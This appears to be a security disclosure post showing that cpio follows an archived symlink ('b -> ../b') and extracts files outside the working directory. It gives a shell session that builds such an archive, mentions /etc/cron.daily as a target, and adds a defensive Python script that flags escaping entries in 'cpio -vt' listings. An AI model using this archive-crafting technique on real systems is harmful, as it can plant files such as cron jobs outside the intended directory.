P.P.S. I found a more subtle security hole. It is even more dangerous.

    /tmp/aaa$ mkdir ../b
    /tmp/aaa$ ln -s ../b b
    /tmp/aaa$ touch ../b/trojan
    /tmp/aaa$ ls b
    trojan
    /tmp/aaa$ find b b/trojan
    b
    b/trojan
    /tmp/aaa$ find b b/trojan | cpio -o > dangerous
    cpio: b: truncating inode number
    cpio: b/trojan: truncating inode number
    1 block
    /tmp/aaa$ /bin/rm -v b/trojan b
    removed `b/trojan'
    removed `b'
    /tmp/aaa$ ls
    dangerous
    /tmp/aaa$ cpio -t<dangerous
    b
    b/trojan
    1 block
    /tmp/aaa$ cpio -vt<dangerous
    lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b
    -rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan
    1 block
Notice that grep '\.\.' on the output of cpio -t would not find the relative pathname. You have to use cpio -vt. Now watch this:

    /tmp/aaa$ cpio -i<dangerous
    1 block
    /tmp/aaa$ ls
    b dangerous
    /tmp/aaa$ ls ../b
    trojan

IMHO cpio should disallow this by default. Imagine ../../../../../../../etc/cron.daily again. cpio should check for extracting in directories that are not below pwd, even if it is via indirect means such as a symlink. Wow!
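The check the post asks cpio for can be done before extraction by replaying the archive listing in order: record every symlink entry as it would be created, then resolve each later entry's path through those symlinks and see where the write would actually land. The script below is an added example (not part of the post and not cpio's own code); it parses `cpio -vt` output, which is the only listing that shows symlink targets, and reports every entry whose resolved location is outside the extraction directory. The sample listing is the one the post shows for the archive `dangerous`; the helper names `parse_listing`, `find_escapes` and `Entry` are this example's own.

```python
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample input: the "cpio -vt" lines the post shows for "dangerous".
SAMPLE_LISTING = """\
lrwxrwxrwx   1 kpc      kpc             4 Apr 27 19:46 b -> ../b
-rw-------   1 kpc      kpc             0 Apr 27 19:46 b/trojan
"""

# One "cpio -vt" line: mode, links, owner, group, size, month, day,
# time-or-year, then the name (and " -> target" for a symlink).
LINE_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"[A-Za-z]{3}\s+\d{1,2}\s+[\d:]+\s+(?P<rest>.+)$"
)


@dataclass
class Entry:
    name: str
    is_symlink: bool
    target: Optional[str]  # link target; None unless the entry is a symlink


def parse_listing(text: str) -> List[Entry]:
    """Turn "cpio -vt" output into Entry records, in archive order."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised listing line: {line!r}")
        is_symlink = m.group("mode").startswith("l")
        rest = m.group("rest")
        if is_symlink and " -> " in rest:
            name, target = rest.split(" -> ", 1)
        else:
            name, target = rest, None
        entries.append(Entry(name, is_symlink, target))
    return entries


def _resolve(path: str, symlinks: Dict[str, str], max_hops: int = 40) -> str:
    """Where `path` lands once every symlink created so far is followed.
    Results stay relative to the extraction directory; a leading '..' or an
    absolute result means the write lands outside it."""
    if posixpath.isabs(path):
        return posixpath.normpath(path)
    current = ""
    for comp in posixpath.normpath(path).split("/"):
        if comp in ("", "."):
            continue
        candidate = posixpath.normpath(posixpath.join(current, comp))
        hops = 0
        while candidate in symlinks:  # follow chained symlinks
            target = symlinks[candidate]
            if posixpath.isabs(target):
                candidate = posixpath.normpath(target)
            else:
                candidate = posixpath.normpath(
                    posixpath.join(posixpath.dirname(candidate), target))
            hops += 1
            if hops > max_hops:
                raise ValueError(f"symlink loop while resolving {path!r}")
        current = candidate
    return current


def find_escapes(entries: List[Entry]) -> List[Tuple[str, str]]:
    """Simulate extraction in archive order; return (name, reason) for each
    entry whose final location is outside the extraction directory."""
    symlinks: Dict[str, str] = {}
    findings = []
    for e in entries:
        if posixpath.isabs(e.name):
            findings.append((e.name, "absolute path"))
            continue
        resolved = _resolve(e.name, symlinks)
        if resolved == ".." or resolved.startswith("../") or posixpath.isabs(resolved):
            findings.append((e.name, f"extracts to {resolved}"))
        if e.is_symlink and e.target is not None:
            # Key by the resolved name so a link nested under an earlier
            # link is still found on later lookups.
            symlinks[resolved] = e.target
    return findings


if __name__ == "__main__":
    for name, reason in find_escapes(parse_listing(SAMPLE_LISTING)):
        print(f"UNSAFE {name}: {reason}")
```

Run against a real archive with `cpio -vt < archive | python3 check.py` after changing the `__main__` block to read `sys.stdin`; a non-empty report means the archive should not be extracted as-is. The `grep '\.\.'` test from the post fails here precisely because no entry name contains `..`; the escape only appears once the symlink target from the `-v` column is followed.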